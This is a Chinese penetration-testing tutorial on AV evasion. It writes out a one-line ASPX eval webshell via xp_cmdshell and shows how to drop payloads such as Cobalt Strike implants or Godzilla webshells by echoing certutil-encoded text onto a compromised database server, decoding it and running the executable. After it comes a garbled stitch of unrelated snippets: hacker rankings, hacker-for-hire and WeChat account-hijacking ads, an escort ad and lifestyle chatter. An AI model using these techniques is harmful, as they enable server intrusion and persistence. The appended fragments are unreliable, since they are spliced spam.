各位在渗透中是否遇见过这个问题:
虽然有低权限命令shell,如mssql、postgres等,执行下载总是各种无权限或者被AV杀,轻则无法继续渗透,重则弹出拦截消息,管理员上机后立马发现。
本文将介绍一种使用windows自带工具进行编码,写入编码数据到TXT文本最后再解码的骚操作。
话不多说,例如这样场景:在数据库连接后或者sqlmap注入连接os-shell后可执行命令:
其中包括杀软或某狗、某盾:
此时下载文件的各种命令均被拦截:
bitsadmin:
certutil证书:
还会被杀软报警:
powershell也会被彻底封杀:
尤其是某管家,拦截更彻底,根本没有倒计时自动消失(此时需要夸一下某大厂的报警提示倒计时功能)
而在这种环境下可在有权限写入的前提下尝试写入一句话木马:
xp_cmdshell 'echo? ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["bmfx"], "unsafe");%^>> D:\\WWW\\bmfx.aspx'
但也存在被某狗、WAF杀掉的可能。
此时,骚操作上场。
windows自带的证书下载,也就是上文使用但远程下载被拦截的Certutil,还可用来对文件编码解码:
本地: Certutil -encode artifact.txt artifact.exe 或指定路径: Certutil -encode d:\artifact.txt d:\artifact.exe
将txt文本使用echo命令:
echo sfAFASFAsfasgasdf………>>d:\1.txt
写入服务器后,进入txt所在目录执行解码(或直接指定物理目录文件):
Certutil -decode art.txt art.exe 或: Certutil -decode d:\art.txt d:\art.exe
后续可在命令中执行exe上线:
cmd.exe /c art.exe
重点是:本地解码编码操作不会触发杀软拦截行为!
此外,Certutil支持将任意文件编码解码,除了exe还有aspx、php、jsp等(如加密免杀的webshell,此处使用哥斯拉为例):
可在web站点写入文件后访问txt查看写入有无偏差:
还有一点,本人亲测,编码后txt中的文本类似于生成的shellcode,会自动换行显示,但本地替换换行符、自行拆分换行符,不改变内容的前提下,编码、解码前后的文件不会有任何影响。
但是在navicat等数据库软件里操作的话还有一个限制,echo的长度会提示不要过长:
此时就要看各位师傅们在bypass WaF、AV时如何减小体量了,一般cs的马bypass后会在50k左右,使用sqlmap的—os-shell执行echo不会像navicat要求128字符那么短,但也有长度限制,具体各位可亲测。
中国十大黑客排名是什么?有什么事迹? 1、孤单剑客、冰叶、中华特攻 (King Xer)、冰雪封情。goodwell作为我国黑客界最早安排创始人,掀开我国黑客前史的序幕。goodwell领导下绿色兵团...
请先给出明确答复:黑客接单都是违法的,基本搜不到。解释原因:1.国家明确指定,进行黑客行为是违法的2.腾讯也对黑客进行打压,具体事情请查看国家。 10441057您可以来本群,会给您提供,互相学习的平...
时间过的真快,现在离过年也没有几个月了,在中国人的眼中,过年是一年当中最为隆重的节日,大家都是在过年的时候一家团聚其乐融融,作为走亲访友的日子,大家也希望有自己的假期,2020年有一个闰四月,这意味着...
我们都知道一个人的脸型除了整形、减肥改变,但要想临时的改变那就只能依靠发型啦。选对好的适合的发型,不仅为形象上加分还可以修饰脸部线条,轻松打造巴掌小脸哦!额头窄颧骨高的妹子在选择发型上是十分困难,不过...
“伴游还叫什么意思-【孙谷波】” 预约模特资料:身高173,体重52公斤。本科学历。肤白貌美大长腿,腿长112cm,不管是单独享受或者带出门陪您应酬,都能让已经成功的你更加觉得容光焕发。练习五:文...
一、黑客联系微信(黑客登录别人微信会不会收到提示) 1、微信密码盗过来,在我的手机上登录,ta那边会不会有提示?这个是可,以办好的。 提示什7么的,人家可以设8 置的,那个倒,是不复 6杂的。以前喊...